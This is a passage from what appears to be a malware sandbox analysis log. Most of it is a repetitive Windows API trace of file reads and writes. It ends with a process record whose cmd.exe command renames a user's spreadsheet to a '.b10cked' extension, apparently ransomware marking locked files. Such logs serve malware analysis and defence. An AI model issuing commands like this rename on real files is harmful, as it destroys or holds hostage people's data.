(hFile=0x4c) returned 0x1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: 
lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.903] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.904] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.904] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.904] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] GetFileType (hFile=0x4c) returned 0x1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] GetFileType (hFile=0x4c) returned 0x1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] GetFileType (hFile=0x4c) returned 0x1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] GetFileType (hFile=0x4c) returned 0x1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] GetFileType (hFile=0x4c) returned 0x1 [0128.904] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0128.904] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] GetFileType (hFile=0x4c) returned 0x1 [0128.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.904] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] GetFileType (hFile=0x4c) returned 0x1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] GetFileType (hFile=0x4c) returned 0x1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.905] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.905] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.905] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.905] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] 
GetFileType (hFile=0x4c) returned 0x1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] GetFileType (hFile=0x4c) returned 0x1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] GetFileType (hFile=0x4c) returned 0x1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] GetFileType (hFile=0x4c) returned 0x1 [0128.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.905] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] GetFileType (hFile=0x4c) returned 0x1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] GetFileType (hFile=0x4c) returned 0x1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 
[0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] GetFileType (hFile=0x4c) returned 0x1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] GetFileType (hFile=0x4c) returned 0x1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.906] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.906] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.906] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.906] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] GetFileType (hFile=0x4c) returned 0x1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] GetFileType (hFile=0x4c) returned 0x1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] GetFileType (hFile=0x4c) returned 0x1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.906] GetFileType (hFile=0x4c) returned 0x1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] GetFileType (hFile=0x4c) returned 0x1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] GetFileType (hFile=0x4c) returned 0x1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] GetFileType (hFile=0x4c) returned 0x1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] GetFileType (hFile=0x4c) returned 0x1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.907] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.907] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.907] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.907] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] GetFileType (hFile=0x4c) returned 0x1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] GetFileType (hFile=0x4c) returned 0x1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.907] GetFileType (hFile=0x4c) returned 0x1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] GetFileType (hFile=0x4c) returned 0x1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] GetFileType 
(hFile=0x4c) returned 0x1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] GetFileType (hFile=0x4c) returned 0x1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] GetFileType (hFile=0x4c) returned 0x1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] GetFileType (hFile=0x4c) returned 0x1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.908] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.908] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.908] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.908] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.908] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] GetFileType (hFile=0x4c) returned 0x1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] GetFileType (hFile=0x4c) returned 0x1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] GetFileType (hFile=0x4c) returned 0x1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] GetFileType (hFile=0x4c) returned 0x1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] GetFileType (hFile=0x4c) returned 0x1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] GetFileType (hFile=0x4c) returned 0x1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, 
lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] GetFileType (hFile=0x4c) returned 0x1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] GetFileType (hFile=0x4c) returned 0x1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.909] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.909] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.909] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.909] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] GetFileType (hFile=0x4c) returned 0x1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] GetFileType (hFile=0x4c) returned 0x1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] GetFileType (hFile=0x4c) returned 0x1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0128.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] GetFileType (hFile=0x4c) returned 0x1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] GetFileType (hFile=0x4c) returned 0x1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] GetFileType (hFile=0x4c) returned 0x1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] GetFileType (hFile=0x4c) returned 0x1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] GetFileType (hFile=0x4c) returned 0x1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.910] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.910] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.910] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.910] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x32, lpOverlapped=0x0) returned 1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] GetFileType (hFile=0x4c) returned 0x1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] GetFileType (hFile=0x4c) returned 0x1 [0128.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x32, lpOverlapped=0x0) returned 1 [0128.911] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.911] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.911] _close (_FileHandle=4) returned 0 [0128.911] FindNextFileW (in: hFindFile=0x90eb8, lpFindFileData=0x2af4ec | out: lpFindFileData=0x2af4ec) returned 0 [0128.911] GetLastError () returned 0x12 [0128.911] FindClose (in: hFindFile=0x90eb8 | out: hFindFile=0x90eb8) returned 1 [0128.912] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0128.959] _close (_FileHandle=3) returned 0 [0128.959] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.959] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0128.959] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.959] GetConsoleMode (in: 
hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0128.959] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.959] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0128.960] SetConsoleInputExeNameW () returned 0x1 [0128.960] GetConsoleOutputCP () returned 0x1b5 [0128.960] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0128.960] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.960] exit (_Code=0) Process: id = "87" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16880" os_pid = "0x320" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\CFAWII~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Cf aWIIkKxWa7MD7fCc.xlsx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10684 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10685 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10686 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10687 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 
